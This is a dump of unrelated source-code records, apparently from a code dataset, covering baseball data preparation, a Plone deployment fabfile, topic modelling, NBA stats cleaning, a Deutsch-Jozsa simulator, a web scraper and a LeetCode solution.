Tool/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"354619880","text":"import pandas as pd\n\n# people from: https://raw.githubusercontent.com/chadwickbureau/register/master/data/people.csv\n# sc from:\n# from pybaseball import statcast\n# data = statcast(start_dt='2008-01-01', end_dt='2018-11-30')\n# full statcast.csv.gzip file available upon request.\n\npeople = pd.read_csv(\"people.csv\")\nsc = pd.read_csv(\"statcast.csv.gzip\", compression=\"gzip\")\npeople[\"batter_name\"] = people.name_first + \" \" + people.name_last\nmerged = pd.merge(\n sc,\n people.loc[:, [\"key_mlbam\", \"batter_name\"]],\n how=\"left\",\n left_on=\"batter\",\n right_on=\"key_mlbam\",\n)\ncols2keep = [\n \"player_name\",\n \"batter_name\",\n \"pitch_type\",\n \"game_date\",\n \"release_speed\",\n \"events\",\n \"launch_speed\",\n \"woba_value\",\n \"bb_type\",\n \"balls\",\n \"strikes\",\n \"outs_when_up\",\n \"at_bat_number\",\n \"type\",\n]\nsc = merged.loc[:, cols2keep]\nsc.to_parquet(\"statcast.parquet\", engine=\"pyarrow\")\nsc.to_parquet(\n \"https://s3.amazonaws.com/hank-statcast/statcast.parquet\", engine=\"pyarrow\"\n)\n\nsc[\"date\"] = pd.to_datetime(merged[\"game_date\"])\nrecent = sc.loc[sc.date > \"2018-01-01\", :]\nrecent.drop(columns=[\"date\"], inplace=True)\nrecent.to_parquet(\"statcast2018.parquet\", engine=\"pyarrow\")\nrecent.to_parquet(\n \"https://s3.amazonaws.com/hank-statcast/statcast2018.parquet\", engine=\"pyarrow\"\n)\n","sub_path":"data/build_data.py","file_name":"build_data.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"302712366","text":"from fabric.api import cd\nfrom fabric.api import env\nfrom fabric.api import run\nimport sys\nimport time\n\n\ndef to_bool(value):\n if isinstance(value, bool):\n return value\n if not isinstance(value, basestring):\n raise ValueError(\"Must be string: %r\" % value)\n if not value:\n return False\n value = value[0].lower()\n # yes/true/ja/1\n if value in ('y', 't', 'j', '1'):\n return True\n # no/false/nee/0\n if value in ('n', 'f', '0'):\n return False\n raise ValueError(\"Cannot interpret as boolean, try true/false instead: %r\"\n % value)\n\n\ndef ontwikkel():\n env.hosts = [\n 'zope@plone-minaraad-on-3-mgt.mmis.be',\n 'zope@plone-minaraad-on-4-mgt.mmis.be',\n ]\n env.buildout_dir = '~/buildout'\n\n\ndef preview():\n env.hosts = [\n 'zope@plone-minaraad-oe-5-mgt.mmis.be',\n 'zope@plone-minaraad-oe-6-mgt.mmis.be',\n ]\n env.buildout_dir = '~/minaraad'\n\n\ndef production():\n env.hosts = [\n 'zope@plone-minaraad-pr-3-mgt.mmis.be',\n 'zope@plone-minaraad-pr-4-mgt.mmis.be',\n ]\n env.buildout_dir = '~/buildout'\n\n\ndef release(tag=None, warmup=True):\n \"\"\"Update Plone.\n \"\"\"\n warmup = to_bool(warmup)\n if not tag:\n print(\"ERROR You should run this with e.g. \"\n \"'fab preview release:tag=1.2.3' or \"\n \"'fab ontwikkel release:tag=master'.\")\n sys.exit(1)\n with cd(env.buildout_dir):\n run('bin/supervisorctl shutdown')\n run('git fetch')\n run('git checkout %s' % tag)\n if '.' not in tag:\n # master or other branch\n run('git pull')\n run('bin/buildout')\n run('bin/supervisord')\n if warmup:\n seconds = 10\n print('Sleeping {} seconds before warmup.'.format(seconds))\n time.sleep(seconds)\n run('bin/warmup-all')\n\n\ndef status():\n \"\"\"Stop Plone.\n \"\"\"\n with cd(env.buildout_dir):\n run('git status')\n run('git describe')\n run('bin/supervisorctl status')\n\n\ndef stop():\n \"\"\"Stop Plone.\n \"\"\"\n with cd(env.buildout_dir):\n run('bin/supervisorctl shutdown')\n\n\ndef start():\n \"\"\"Start Plone.\n \"\"\"\n with cd(env.buildout_dir):\n run('bin/supervisord')\n\n\ndef warmup():\n \"\"\"Warmup Plone/varnish.\n \"\"\"\n with cd(env.buildout_dir):\n run('bin/warmup-all')\n\n\ndef info():\n run('w')\n run('free')\n # This lists the NFS blob storage and tells how much disk space it uses.\n # This should be several Gigabytes.\n run('df -h || echo \"error during df\"')\n status()\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"493204001","text":"import contextlib\n\nimport requests\nfrom loguru import logger\n\nHOST = \"127.0.0.1\"\nPORT = 8000\napi_base = f\"http://{HOST}:{PORT}\"\n# Set device names\nsocl2_endpoint = f\"{api_base}/socl2\"\nhexyldecanoic_endpoint = f\"{api_base}/hexyldecanoic\"\nr4_endpoint = f\"{api_base}/r4-heater/0\"\nflowir_endpoint = f\"{api_base}/flowir\"\n\n\ndef check_for_errors(resp, *args, **kwargs):\n resp.raise_for_status()\n\n\ndef log_responses(resp, *args, **kwargs):\n logger.debug(f\"Reply: {resp.text} on {resp.url}\")\n\n\n@contextlib.contextmanager\ndef command_session():\n with requests.Session() as session:\n session.hooks[\"response\"] = [log_responses, check_for_errors]\n yield session\n","sub_path":"examples/autonomous_reaction_optimization/_hw_control.py","file_name":"_hw_control.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"112678598","text":"import sys\r\nimport random\r\nfrom numpy import zeros\r\nimport math\r\n\r\nrefList = sys.argv[1]\r\nCR = sys.argv[2]\r\nRandomKmerNo = 8\r\nCoverageTThreshold = 0.9\r\nRKTThreshold = 5\r\nRKTShortestED = 10\r\nRKTEDThreshold = 10\r\nLmerSpltNo = 5\r\nCoverageEDThreshold = 10\r\n\r\n\r\ndef Ktest(CR):\r\n with open(CR) as TCR:\r\n K = len(TCR.readline().rstrip())\r\n return K\r\n\r\nK = Ktest(CR)\r\n\r\ndef parseRef(ref):\r\n\r\n reff = \"\"\r\n with open(ref) as ref:\r\n name = ref.readline()[1:]\r\n while True:\r\n first_line = ref.readline()\r\n if len(first_line) == 0:\r\n break\r\n reff += first_line.rstrip()\r\n return name, reff\r\n\r\n\r\ndef refHash(refList):\r\n\r\n Hash = {}\r\n with open(refList) as rl:\r\n\r\n while True:\r\n fn = rl.readline()\r\n if len(fn) == 0:\r\n break\r\n name, reff = parseRef(fn.rstrip())\r\n Hash[name] = reff\r\n return Hash\r\n\r\nrefHash = refHash(refList)\r\n\r\ndef parseCR(CR):\r\n\r\n CRS = {}\r\n\r\n with open(CR) as cr:\r\n\r\n while True:\r\n c = cr.readline()\r\n if len(c) == 0:\r\n break\r\n A, T, C, G = c.rstrip().count(\"A\"). c.rstrip().count(\"T\"), c.rstrip().count(\"C\"), c.rstrip().count(\"G\")\r\n if (A, T, C, G) not in CRS:\r\n a = set()\r\n a.add(c.rstrip())\r\n CRS[(A, T, C, G)] = a\r\n else: CRS[(A, T, C, G)].add(c.rstrip())\r\n\r\n return CRS\r\n\r\nCRS = parseCR(CR)\r\n\r\n\r\ndef findall(p):\r\n s = 0\r\n\r\n\r\ndef LmerSplit(read, K, LmerSpltNo):\r\n\r\n Lmers = list()\r\n if K % LmerSpltNo > 0:\r\n s = math.floor(K/LmerSpltNo)\r\n Lmers = [read[i:i + s+1] for i in range(0, (K % LmerSpltNo)*(s+1), s+1)]\r\n Lmers = Lmers + [read[i:i + s] for i in range((K % LmerSpltNo)*(s+1), K, s)]\r\n else:\r\n Lmers = [read[i:i + K/LmerSpltNo] for i in range(0, K, K/LmerSpltNo)]\r\n return Lmers\r\n\r\n\r\ndef CoverageTest(cref, CRS, K, LmerSpltNo, EDScoring, CoverageEDThreshold, CoverageTThreshold):\r\n\r\n readsCover = set()\r\n\r\n for i in CRS:\r\n TempCover = set()\r\n Lmers = LmerSplit(i, K, LmerSpltNo)\r\n LC = [len(x) for x in Lmers]\r\n positions = findall(Lmers, cref)\r\n for j, w in zip(positions, LC):\r\n ind = LC.index(w)\r\n if ind == 0:\r\n Stp = 0\r\n else: Stp = sum(w[n] for n in range(0, ind))\r\n for p in j:\r\n StpC = p - Stp\r\n ED = smithWaterman(i, cref[StpC:StpC + K], EDScoring)\r\n TempCover.add((StpC, StpC + K, ED))\r\n if min(TempCover, key = lambda x:x[2]) <= CoverageEDThreshold:\r\n minED = min(TempCover, key = lambda x:x[2])[2]\r\n for z in [z for z in TempCover if z[2] == minED]:\r\n readsCover.add(z[:-1])\r\n else: continue\r\n\r\n Cov = sorted(TempCover)\r\n Intvl = set()\r\n Tempintv = Cov[0]\r\n for m in Cov[1:]:\r\n if m[0] <= Tempintv[1]:\r\n Tempintv = [Tempintv[0], m[1]]\r\n else:\r\n Intvl.add(tuple(Tempintv))\r\n Tempintv = m\r\n\r\n Coverage = 0\r\n for f in Intvl:\r\n Coverage += f[1] - f[0]\r\n\r\n if Coverage/len(cref) >= CoverageTThreshold:\r\n return True\r\n\r\n else:\r\n return False\r\n\r\n\r\ndef randomNOKmer(seq, RandomKmerNo, K):\r\n\r\n result = set()\r\n temp = set()\r\n n = len(seq)\r\n for _ in range(RandomKmerNo):\r\n a = random.randint(0, n - K)\r\n while any(a >= i and a <= i + K for i in temp):\r\n a = random.randint(0, n - K)\r\n temp.add(a)\r\n\r\n for i in temp:\r\n result.add(seq[i:i+K])\r\n\r\n return result\r\n\r\n\r\ndef EDScoring(xc, yc):\r\n\r\n if xc == yc: return 0\r\n if xc == '-' or yc == '-': return 1\r\n else:\r\n return 1\r\n\r\n\r\ndef smithWaterman(x, y, s):\r\n\r\n D = zeros((len(x) + 1, len(y) + 1), dtype=int)\r\n for j in range(1, len(y) + 1):\r\n D[0, j] = D[0, j - 1] + s('-', y[j - 1])\r\n for i in range(1, len(x) + 1):\r\n D[i, 0] = D[i - 1, 0] + s(x[i - 1], '-')\r\n for i in range(1, len(x) + 1):\r\n for j in range(1, len(y) + 1):\r\n D[i, j] = min(D[i - 1, j - 1] + s(x[i - 1], y[j - 1]),\r\n D[i - 1, j] + s(x[i - 1], '-'),\r\n D[i, j - 1] + s('-', y[j - 1]))\r\n return D[len(x), len(y)]\r\n\r\n\r\ndef ClassificationMatch(CRS, refHash, K, RKTEDThreshold, RKTShortestED, LmerSpltNo, EDScoring,\r\n CoverageEDThreshold, CoverageTThreshold, RKTThreshold):\r\n\r\n Clist = set()\r\n\r\n for i in refHash:\r\n RK = randomNOKmer(refHash[i], RandomKmerNo, K)\r\n counter = 0\r\n for j in RK:\r\n A, T, C, G = j.count(\"A\"), j.count(\"T\"), j.count(\"C\"), j.count(\"G\")\r\n for w in [key for key in CRS if sum((abs(x - y)) for x, y in zip(key, (A, T, C, G))) / 4 <= RKTShortestED]:\r\n for z in CR[w]:\r\n sw = smithWaterman(j, z, EDScoring)\r\n if sw <= RKTEDThreshold:\r\n counter += 1\r\n break\r\n else: continue\r\n else: continue\r\n break\r\n if counter < RKTThreshold:\r\n continue\r\n else:\r\n CT = CoverageTest(refHash[i], CRS, K, LmerSpltNo, EDScoring, CoverageEDThreshold, CoverageTThreshold)\r\n if CT: Clist.add(i)\r\n else: continue\r\n return Clist","sub_path":"codebase/src/Core_2.0.py","file_name":"Core_2.0.py","file_ext":"py","file_size_in_byte":5436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"306099336","text":"from gensim import corpora\nfrom gensim import models\nfrom gensim.models import CoherenceModel\nfrom collections import defaultdict\nimport pyLDAvis.gensim as gensimvis\nimport pyLDAvis\n\ndef get_filtered_words(docs):\n term_fre_dict = defaultdict(int)\n doc_fre_dict = defaultdict(int)\n\n for doc in docs:\n for word in doc:\n term_fre_dict[word] += 1\n for word in set(doc):\n doc_fre_dict[word] += 1\n \n max_doc_frequency = 1000\n min_doc_frequency = 3\n max_term_frequency = 7000\n min_term_frequency = 5\n \n doc_frequency_filtered = {k:v for k, v in doc_fre_dict.items() if ((v>=min_doc_frequency) and (v <= max_doc_frequency))}\n term_frequency_filtered = {k:v for k, v in term_fre_dict.items() if ((v>=min_term_frequency) and (v <= max_term_frequency))}\n both_satisfied = {k:v for k, v in term_frequency_filtered.items() if k in doc_frequency_filtered}\n \n return both_satisfied\n\ndef get_highest_topic(topic_list):\n highest_topic = 100\n highest_prob = 0\n for topic, prob in topic_list:\n if prob > highest_prob:\n highest_prob = prob\n highest_topic = topic\n return highest_topic, highest_prob\n\ndef build_doc_word_matrix(docs):\n dictionary = corpora.Dictionary(docs)\n corpus = []\n for doc in docs:\n bow = dictionary.doc2bow(doc)\n corpus.append(bow)\n\n return corpus, dictionary\n\ndef print_topic_words(model):\n f = open(f'{KEYWORD}_LDA_.txt','w')\n for topic_id in range(model.num_topics):\n word_probs = model.show_topic(topic_id, NUM_TOPIC_WORDS)\n print(\"Topic ID: {}\".format(topic_id))\n f.write(str(topic_id)+'\\n')\n for word, prob in word_probs:\n print(\"\\t{}\\t{}\".format(word, prob))\n f.write(str(word)+'\\t'+str(prob)+'\\n')\n print(\"\\n\")\n f.close()\n\ndef compute_coherence_values(dictionary, corpus, texts, limit, start=2, step=3):\n \"\"\"\n Compute c_v coherence for various number of topics\n\n Parameters:\n ----------\n dictionary : Gensim dictionary\n corpus : Gensim corpus\n texts : List of input texts\n limit : Max num of topics\n\n Returns:\n -------\n model_list : List of LDA topic models\n coherence_values : Coherence values corresponding to the LDA model with respective number of topics\n \"\"\"\n coherence_values = []\n model_list = []\n for num_topics in range(start, limit, step):\n model = models.ldamodel.LdaModel(corpus, num_topics=num_topics,\n id2word=dictionary,\n alpha='auto')\n model_list.append(model)\n coherencemodel = CoherenceModel(model=model, texts=texts, dictionary=dictionary, coherence='c_v')\n coherence_values.append(coherencemodel.get_coherence())\n\n return model_list, coherence_values","sub_path":"custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"146604262","text":"# Imports\nimport pandas as pd\nimport numpy as np\nimport os\nimport pprint\n\nimport matplotlib as plt\nimport seaborn as sns\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport nba_acquire\n\nnp.random.seed(123)\n\n#--------- DataFrame Work -----------\n\n#--------- player_data_df -----------\n# get it from nba_acquire.py\nplayer_data_df = nba_acquire.player_data()\n\n# change 'name' column to 'player' column so we can merge later\nplayer_data_df = player_data_df.rename(columns={\"name\" : \"player\"})\n\n#--------- players_df ---------------\n# get it from nba_acquire.py\nplayers_df = nba_acquire.data_of_players()\n\n# change 'Player' column to 'player' so we can merge later\nplayers_df = players_df.rename(columns={\"Player\" : \"player\"})\n\n# dropping duplicate column names (the same names as in seasons_stats) so that we can merge in 'final_df'\n# players_df = players_df.drop([\"player\", \"height\", \"weight\", \"college\",], axis=1)\n\n#--------- seasons_stats_df ---------\n# get it from nba_acquire.py\nseasons_stats_df = nba_acquire.seasons_stats()\n\n# get rid of duplicate columns to avoid 'ValueError: Plan shapes are not aligned' error on later df merge\n# seasons_stats_df = seasons_stats_df.loc[:,~seasons_stats_df.columns.duplicated()]\n\n# converting certain datatypes from floats to integers\nconvert_dict = {\"2_point_tries\" : int, \n \"2_pointers\" : int,\n \"3_point_tries\" : int,\n \"3_pointers\" : int, \n \"age\" : int,\n \"assists\" : int, \n \"blocks\" : int, \n \"def_rebounds\" : int, \n \"field_goal_attempts\" : int, \n \"field_goals\" : int,\n \"free_throws\" : int, \n \"free_throw_attempts\" : int, \n \"games\" : int, \n \"games_started\" : int, \n \"off_rebounds\" : int, \n \"personal_fouls\" : int, \n \"points\" : int, \n \"steals\" : int,\n \"three_pt_tries\" : int,\n \"total_rebounds\" : int, \n \"turnovers\" : int, \n \"year\" : int,\n } \n\n# # turn off column limit so I can see the data in all columns:\npd.options.display.max_columns = None\n\n# # change the datatypes\nseasons_stats_df = seasons_stats_df.astype(convert_dict) \n\n#--------- final_df -----------------\ndef final_df():\n \"\"\"\n Function to return merged and completely cleaned final_df\n \"\"\"\n\n#------------ Get cleaned player_data_df ------------\n\n player_data_df\n\n#------------ Get cleaned players_df ----------------\n\n players_df \n\n#------------ Get cleaned seasons_stats_df ----------\n\n seasons_stats_df \n\n#------------ Merging DataFrames --------------------\n\n # merging seasons_stats and player_data dfs\n final_df = pd.merge(seasons_stats_df, player_data_df, on=[\"player\"], how=\"left\")\n\n # merging 'seasons_stats' (w/ 'player_data') and 'players_dfs'\n final_df = pd.concat([final_df, players_df])\n\n # dropping duplicates for final_df\n final_df.drop_duplicates(subset=\"player\", inplace=True)\n\n # filling all nulls with a 1\n final_df = final_df.fillna(1)\n\n # changing datatypes of columns for better view\n\n final_convert = {\"2_point_tries\" : int, \n \"2_pointers\" : int,\n \"3_point_tries\" : int,\n \"3_pointers\" : int, \n \"age\" : int,\n \"assists\" : int, \n \"blocks\" : int,\n \"born\" : int, \n \"def_rebounds\" : int, \n \"field_goal_attempts\" : int, \n \"field_goals\" : int,\n \"free_throws\" : int, \n \"free_throw_attempts\" : int, \n \"games\" : int, \n \"games_started\" : int, \n \"height_inches\" : int,\n \"minutes_played\" : int, \n \"off_rebounds\" : int, \n \"personal_fouls\" : int, \n \"points\" : int, \n \"steals\" : int,\n \"three_pt_tries\" : int,\n \"total_rebounds\" : int, \n \"turnovers\" : int,\n \"weight\" : int,\n \"year\" : int,\n \"year_end\" : int, \n \"year_start\" : int,\n } \n # apply datatype changes\n final_df = final_df.astype(final_convert) \n\n # dropping 'position_y', 'born', 'year_start', 'year_end', 'three_pt_tries'\n final_df = final_df.drop([\"position_y\", \"born\", \"year_start\", \"year_end\", \n \"three_pt_tries\"], axis=1)\n\n # renaming 'position_x' to just 'position'\n final_df = final_df.rename(columns = {\"position_x\" : \"position\"})\n\n # rearranging columns for reading ease\n final_df = final_df[[\"player\", \"position\", \"age\", \"height_inches\", \"weight\", \"team\", \n \"birth_date\", \"birth_city\", \"birth_state\", \"year\", \"college\", \n \"games\", \"games_started\", \"minutes_played\", \"usage_%\",\n \"points\", \"field_goals\", \"field_goal_attempts\", \n \"field_goal_%\", \"effective_field_goal_%\",\n \"2_point_tries\", \"2_pointers\", \"2_point_%\", \n \"3_point_tries\", \"3_pointers\", \"3_point_%\",\n \"free_throws\", \"free_throw_attempts\", \"free_throw_%\", \n \"true_shooting_%\", \"assists\", \"assist_%\", \n \"blocks\", \"block_%\", \"steals\", \n \"steal_%\", \"total_rebounds\", \"total_rebound_%\", \n \"off_rebounds\", \"off_rebound_%\", \"def_rebounds\", \"def_rebound_%\",\n \"turnovers\", \"turnover_%\", \"offensive_win_shares\",\n \"defensive_win_shares\", \"win_shares\", \"win_shares_per_48min\",\n \"personal_fouls\", \"player_efficiency\", \"off_box_plus_minus\", \n \"def_box_plus_minus\", \"box_plus_minus\", \"value_over_replacement\",\n ]]\n\n # renaming of more columns for clarity's sake\n final_df = final_df.rename(columns={\n \"weight\": \"weight_lbs\", \n \"birth_date\" : \"date_of_birth\",\n \"year\" : \"season\",\n \"points\" : \"total_points\",\n \"field_goals\" : \"field_goals_made\",\n \"2_pointers\" : \"2_pointers_made\",\n \"2_pointers_tries\" : \"2_pointers_made\",\n \"3_pointers\" : \"3_pointers_made\",\n \"3_point_tries\" : \"3_pointers_tried\",\n \"off_plus_minus\" : \"value_on_offense\", \n \"def_box_plus_minus\" : \"value_on_defense\",\n \"def_box_plus_minus\" : \"total_value\", \n \"value_over_replacement\" : \"value_over_bench_sub\"},) \n\n # setting 'final_df' column 'player' to index\n final_df = final_df.set_index(\"player\")\n\n #--------- Title final_df ---------------------------\n d = final_df.isnull().sum().sum()\n final_df_shape = final_df.shape\n print(\"Final DataFrame\")\n print(\"Consisting of player_data_df, players_df, and seasons_stats_df.\")\n print(f\"It contains {final_df_shape[0]} rows and {final_df_shape[1]} columns\")\n print(f\"It has loads of data, but also has {d} missing values.\")\n\n # get the dataframe back\n return final_df","sub_path":"shay/src/nba_preprocessing.py","file_name":"nba_preprocessing.py","file_ext":"py","file_size_in_byte":7258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"589449185","text":"\"\"\"\r\nAUTHOR: Luis Gabriel Q. del Rosario\r\nDATE: 01 MAY, 2019\r\nDESCRIPTION: Simulation of Deutsch-Jozsa algorithm using Linear Algebra\r\n - NOTE: FILENAME of input should be test_cases.txt\r\n - INPUT #1 is the number of qubits, INCLUDING the ancilla bit\r\n - INPUT #2 is the function mapping for f(x), separated by newlines\r\n - OUTPUT consists of the ff:\r\n - Probability distribution of final outcomes\r\n - Pie chart of the distribution\r\n - Verdict on wether the function is constant or balanced\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nH = np.matrix(((1, 1), (1, -1))) / np.sqrt(2)\r\nZ = np.matrix(((1, 0), (0, -1)))\r\nX = np.matrix(((0, 1), (1, 0)))\r\nP0 = np.matrix(((1, 0), (0, 0)))\r\nP1 = np.matrix(((0, 0), (0, 1)))\r\n\r\ndef scale(qnum, op, num_qubits):\r\n \"\"\"Generate a matrix that only applies gate 'op' to its respective qubit.\"\"\"\r\n gate_list = [np.eye(2) for i in range(num_qubits)] # all qubits go through I\r\n gate_list[qnum] = op # this is the only qubit that has a gate that isn't I\r\n scaled = gate_list[0] # start scaling from the 1st qubit\r\n\r\n # get the kronecker product of all gates in gate_list\r\n for quantum_gate in gate_list[1:]:\r\n scaled = np.kron(scaled, quantum_gate)\r\n\r\n return scaled\r\n\r\ndef scale_all(op, num_qubits, skip_last=False):\r\n \"\"\"Generate a matrix that applies 'op' to all qubits (skip_last means last qubit is I).\"\"\"\r\n scaled = op\r\n for repeat in range(num_qubits - (2 if skip_last else 1)):\r\n scaled = np.kron(scaled, op)\r\n if skip_last:\r\n scaled = np.kron(scaled, np.eye(2))\r\n return scaled\r\n\r\ndef get_tensor(vectors):\r\n \"\"\"Compute the tensor product of all vectors in the given list.\"\"\"\r\n tensor = vectors[0]\r\n for vector in vectors[1:]:\r\n tensor = np.kron(tensor, vector)\r\n return tensor.transpose()\r\n\r\ndef init_qubits(num_qubits):\r\n \"\"\"Initialize all qubit vectors based on num_qubits.\"\"\"\r\n q = [np.matrix([1,0]) for i in range(num_qubits)]\r\n return get_tensor(q)\r\n\r\ndef CNOT(control, target, num_qubits):\r\n \"\"\"Generate CNOT based on the idea that CNOT = (P0 (x) I) + (P1 (x) X).\"\"\"\r\n term_0 = scale(control, P0, num_qubits)\r\n term_1 = (scale(control, P1, num_qubits) * scale(target, X, num_qubits))\r\n return term_0 + term_1\r\n\r\ndef run_algo(op_list):\r\n \"\"\"Execute all operations in a given list (multiply all matrices to each other).\"\"\"\r\n ops = op_list[::-1] # reverse the list; after all, it's matrix mult.\r\n result = ops[0]\r\n for op in ops[1:]:\r\n result = result * op\r\n return result\r\n\r\ndef measure(result, num_qubits):\r\n \"\"\"Omit the last qubit, combine probabilities of the same kind (e.g. 000/001, 100/101)\"\"\"\r\n measurement = np.zeros(2**(num_qubits-1))\r\n for index, value in enumerate(result.transpose().tolist()[0]):\r\n measurement[index >> 1] += value * value\r\n return measurement\r\n\r\ndef significant(n):\r\n \"\"\"Check if value is significantly greater than 0.\"\"\"\r\n return (n < -1e-10 or n > 1e-10)\r\n\r\ndef generate_pie_chart(measurement, num_qubits):\r\n \"\"\"Generates a pie chart for the probability distribution of a given measurement.\"\"\"\r\n x_labels = []\r\n measurement_to_plot = []\r\n\r\n # Only consider those that are significantly greater than 0.\r\n for r in range(2**(num_qubits-1)):\r\n if (significant(measurement[r])):\r\n x_labels.append(bin(r)[2:])\r\n measurement_to_plot.append(measurement[r])\r\n plt.pie(measurement_to_plot, labels=x_labels)\r\n plt.show()\r\n\r\ndef U(f_map, num_qubits):\r\n \"\"\"Generate an oracle matrix based on the given function mapping.\"\"\"\r\n # INSPIRED BY https://github.com/meownoid/quantum-python/blob/master/quantum.py\r\n\r\n U = np.zeros((2**num_qubits, 2**num_qubits)) # Start with a matrix of zeroes.\r\n \r\n # Quantum state looks like IN-IN-IN-IN-IN-IN-OUT\r\n for input_state in range(2**num_qubits): # For each possible input\r\n input_string = input_state >> 1 # remove OUT\r\n output_qubit = (input_state & 1) ^ (f_map[input_string]) # remove IN, XOR with f(IN)\r\n output_state = (input_string << 1) + output_qubit # the full state, with new OUT\r\n U[input_state, output_state] = 1 # set that part of U to 1\r\n return U\r\n\r\ndef print_probabilities(measurement, num_qubits):\r\n \"\"\"Print the probability distribution of a measurement.\"\"\"\r\n print (\"\\n\\tPROBABILITY DISTRIBUTION OF OUTCOMES:\\n\")\r\n print (\"\\tOUTCOME\\t\\tP(n)\")\r\n print (\"\\t-------\\t\\t----\")\r\n for label, p in enumerate(measurement):\r\n print (\"\\t{0:0{1}b}\\t\\t{2:.2%}\".format(label, num_qubits-1, p))\r\n\r\ndef deutsch_jozsa(f_map, num_qubits):\r\n \"\"\"Run the Deutsch-Jozsa Algorithm. Returns T if constant and F if balanced.\"\"\"\r\n op_list = [] # the list of operations\r\n\r\n op_list.append(init_qubits(num_qubits)) # Initialize qubits to |0>\r\n op_list.append(scale(num_qubits-1, X, num_qubits)) # Set last qubit to |1>\r\n\r\n # START: H on all qubits\r\n op_list.append(scale_all(H, num_qubits))\r\n\r\n # Apply oracle function based on user-input f_map\r\n op_list.append(U(f_map, num_qubits))\r\n\r\n # END: H on all but last qubit\r\n op_list.append(scale_all(H, num_qubits, skip_last=True))\r\n\r\n # RUN THE ALGORITHM\r\n result = run_algo(op_list)\r\n\r\n # Measure all but last qubit\r\n measurement = measure(result, num_qubits)\r\n\r\n # Finally, determine function type, and generate pie chart.\r\n # print_probabilities(measurement)\r\n # generate_pie_chart(measurement)\r\n \r\n # CONSTANT if measurement of |0> is positive, else BALANCED\r\n return True if significant(measurement[0]) else False\r\n\r\ndef main():\r\n test_cases_file = open(\"test_cases.txt\", \"r\")\r\n\r\n for case_no, line in enumerate(test_cases_file):\r\n f_map = list(map(int, line.split()))\r\n num_qubits = f_map.pop(0)\r\n result = deutsch_jozsa(f_map, num_qubits)\r\n print(\"CASE {}: {}\".format(case_no+1, (\"CONSTANT\" if result else \"BALANCED\")))\r\n test_cases_file.close()\r\nmain()","sub_path":"deutsch_jozsa_simulator.py","file_name":"deutsch_jozsa_simulator.py","file_ext":"py","file_size_in_byte":6012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"560961218","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pymongo\nfrom datetime import datetime\n\nclient = pymongo.MongoClient('localhost',27017)\nganji = client['ganji']\nurl_list = ganji['url_list']\nitem_info = ganji['item_info']\n#pymongo执行代码\n\ndef get_link_from(url,times = 0):#传入all_link=url\n if times > 10:#限制重复\n return\n for page in range(1,31):#自增30页\n list_views = '{}o{}'.format(url,page)\n try:\n wb_data = requests.get(list_views,timeout=6)#timeout超时限制\n except:\n return get_link_from(url,times + 1)\n soup = BeautifulSoup(wb_data.text,'lxml')\n if soup.select('div.noinfotishi'):#为空则返回\n return\n else:\n for link in soup.select('td.t > a'):\n item_link = link.get('href')\n if 'zhuanzhuan' in item_link:\n print(item_link)\n url_list.insert_one({'url':item_link})#添加数据{'url':'xx'}\n#初始链接\n\ndef get_item_info_from(url,times = 0):\n if times > 10:\n return\n try:\n wb_data = requests.get(url,timeout = 6)\n except:\n return get_item_info_from(url,times + 1)\n soup = BeautifulSoup(wb_data.text,'lxml')\n item = item_info.find({'url':url})\n if item.count() > 0:\n if soup.select('span.soldout_btn'):\n print('get one!')\n item_info.update({'url':url},{'$set':{'sold_date':str(datetime.now().strftime('%Y,%m,%d'))}})\n else:\n title = soup.select('h1.info_titile')\n price = soup.select('span.price_now > i')\n area = soup.select('div.palce_li > span > i')\n view = soup.select('span.look_time')\n cate = soup.select('span.crb_i > a')\n data = {\n 'title':title[0].text if title else None,\n 'price':price[0].text if price else 0,\n 'area':area[0].text.split('-') if area else None,\n 'view':view[0].text if view else None,\n 'cate':cate[-1].text.strip() if cate else None,\n 'date':str(datetime.now().strftime('%Y,%m,%d')),\n 'sold_date':None,\n 'url':url,\n }\n #获取商品信息详情!\n print(data)\n item_info.insert_one(data)\n","sub_path":"ganji/page_parsing.py","file_name":"page_parsing.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"213328206","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: longshuicui\n@date : 2021/1/26\n@function:\n605. Can Place Flowers (Easy)\nhttps://leetcode.com/problems/can-place-flowers/\n题目描述\n 你有一个很长的花坛,其中有些种植了一些,有些没有。然而,鲜花不能种植在 相邻 的地块上。\n 给定一个包含0和1的整数数组花坛,其中0表示空,1表示非空,以及一个整数n,返回n个新花是否可以种植在花坛中而不违反无邻接花规则。\n输入输出样例\n Input: flowerbed = [1,0,0,0,1], n = 2\n Output: false\n\"\"\"\n\n\ndef canPlaceFlowers(flowerbed, n):\n count = 0\n i = 0\n while i < len(flowerbed):\n if flowerbed[i] == 0 \\\n and (i == 0 or flowerbed[i - 1] == 0) \\\n and (i == len(flowerbed) - 1 or flowerbed[i + 1] == 0):\n count += 1\n flowerbed[i] = 1\n i += 1\n i += 1\n if count < n:\n return False\n return True\n\n\nflowerbed=[1,0,0,0,0,1]\nn=2\nres=canPlaceFlowers(flowerbed, n)\nprint(res)\n","sub_path":"01.贪心算法/分配问题/605.Can Place Flowers (Easy).py","file_name":"605.Can Place Flowers 